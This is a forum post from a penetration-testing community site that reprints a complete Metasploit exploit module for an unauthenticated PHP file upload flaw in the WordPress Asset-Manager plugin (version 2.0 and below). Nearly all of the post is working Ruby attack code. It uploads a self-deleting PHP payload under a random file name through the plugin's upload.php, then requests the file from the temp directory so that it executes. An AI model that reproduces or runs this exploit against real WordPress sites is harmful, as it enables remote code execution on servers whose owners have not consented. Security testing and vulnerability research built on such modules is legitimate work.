China Network Penetration Testing Alliance

Title: WordPress Asset-Manager PHP File Upload Vulnerability

Author: admin    Time: 2012-12-31 09:22
This is a Metasploit module for a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http:// www.myhack58.com /' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random file name so the dropped PHP file is not guessable from a fixed string;
    # the payload deletes itself from disk once it runs (:unlink_self).
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php expects a multipart form with the file in a field named "Filedata".
    # Rex::MIME::Message emits a leading CRLF before the first boundary; strip it.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored file name back in the response body.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands, unauthenticated, in the plugin's temp upload directory,
    # which is served directly by the web server, so a GET executes it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2